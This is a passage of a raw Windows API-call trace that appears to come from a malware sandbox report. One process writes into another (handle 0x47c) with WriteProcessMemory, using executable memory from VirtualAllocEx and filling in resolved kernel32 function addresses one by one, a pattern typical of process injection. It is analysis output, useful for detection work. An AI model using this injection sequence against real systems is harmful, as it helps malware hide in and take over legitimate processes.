	[0187.764] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6b12*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6b12*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0187.764] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.764] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.764] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.764] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.764] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.765] ResetEvent (hEvent=0x478) returned 1
	[0187.765] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.765] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.765] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.765] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.765] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.765] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055170, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.766] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.766] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.766] lstrlenA (lpString="HeapFree") returned 8
	[0187.766] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.766] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6b06*, nSize=0x9, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6b06*, lpNumberOfBytesWritten=0x12857c*=0x9) returned 1
	[0187.766] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.766] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.766] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.766] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.767] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.767] ResetEvent (hEvent=0x478) returned 1
	[0187.767] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.767] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.767] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.767] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.767] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.768] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055174, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.768] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.768] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.768] lstrlenA (lpString="Sleep") returned 5
	[0187.768] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.768] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6afe*, nSize=0x6, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6afe*, lpNumberOfBytesWritten=0x12857c*=0x6) returned 1
	[0187.769] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.769] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.769] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.769] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.769] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.769] ResetEvent (hEvent=0x478) returned 1
	[0187.769] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.770] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.770] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.770] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.770] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.770] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055178, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.770] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.770] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.770] lstrlenA (lpString="GetCPInfo") returned 9
	[0187.770] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.771] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7662*, nSize=0xa, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7662*, lpNumberOfBytesWritten=0x12857c*=0xa) returned 1
	[0187.771] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.771] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.771] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.771] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.771] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.772] ResetEvent (hEvent=0x478) returned 1
	[0187.772] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.772] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.772] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.772] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.772] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.772] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005517c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.772] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.773] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.773] lstrlenA (lpString="GetOEMCP") returned 8
	[0187.773] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.773] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7656*, nSize=0x9, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7656*, lpNumberOfBytesWritten=0x12857c*=0x9) returned 1
	[0187.773] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.773] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.773] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.773] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.773] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.774] ResetEvent (hEvent=0x478) returned 1
	[0187.774] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.774] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.774] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.774] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.774] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.774] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055180, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.775] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.775] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.775] lstrlenA (lpString="IsValidCodePage") returned 15
	[0187.775] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.775] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7644*, nSize=0x10, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7644*, lpNumberOfBytesWritten=0x12857c*=0x10) returned 1
	[0187.775] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.775] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.775] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.776] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.776] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.776] ResetEvent (hEvent=0x478) returned 1
	[0187.776] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.776] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.776] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.777] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.777] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.777] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055184, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.777] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.777] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.777] lstrlenA (lpString="FindFirstFileExA") returned 16
	[0187.777] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.777] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7630*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7630*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0187.778] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.778] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.778] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.778] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.778] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.779] ResetEvent (hEvent=0x478) returned 1
	[0187.779] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.779] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.779] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.779] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.779] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.779] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055188, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.780] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.780] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.780] lstrlenA (lpString="FindClose") returned 9
	[0187.780] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.780] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7624*, nSize=0xa, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7624*, lpNumberOfBytesWritten=0x12857c*=0xa) returned 1
	[0187.781] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.781] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.781] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.781] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.782] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.782] ResetEvent (hEvent=0x478) returned 1
	[0187.782] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.782] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.782] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.783] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.783] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.783] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005518c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.783] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.784] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.784] lstrlenA (lpString="UnhandledExceptionFilter") returned 24
	[0187.784] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.784] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb71d6*, nSize=0x19, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb71d6*, lpNumberOfBytesWritten=0x12857c*=0x19) returned 1
	[0187.784] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.784] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.784] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.784] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.785] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.785] ResetEvent (hEvent=0x478) returned 1
	[0187.785] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.785] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.785] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.785] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.785] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.785] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055190, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.786] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.786] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.786] lstrlenA (lpString="SetUnhandledExceptionFilter") returned 27
	[0187.786] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.786] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb71f2*, nSize=0x1c, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb71f2*, lpNumberOfBytesWritten=0x12857c*=0x1c) returned 1
	[0187.787] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.787] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.787] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.787] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.787] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.788] ResetEvent (hEvent=0x478) returned 1
	[0187.788] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.788] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.788] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.788] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.788] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.788] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055194, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.788] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.788] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.789] lstrlenA (lpString="GetCurrentProcess") returned 17
	[0187.789] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.789] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7210*, nSize=0x12, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7210*, lpNumberOfBytesWritten=0x12857c*=0x12) returned 1
	[0187.789] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.789] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.789] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.789] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.789] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.790] ResetEvent (hEvent=0x478) returned 1
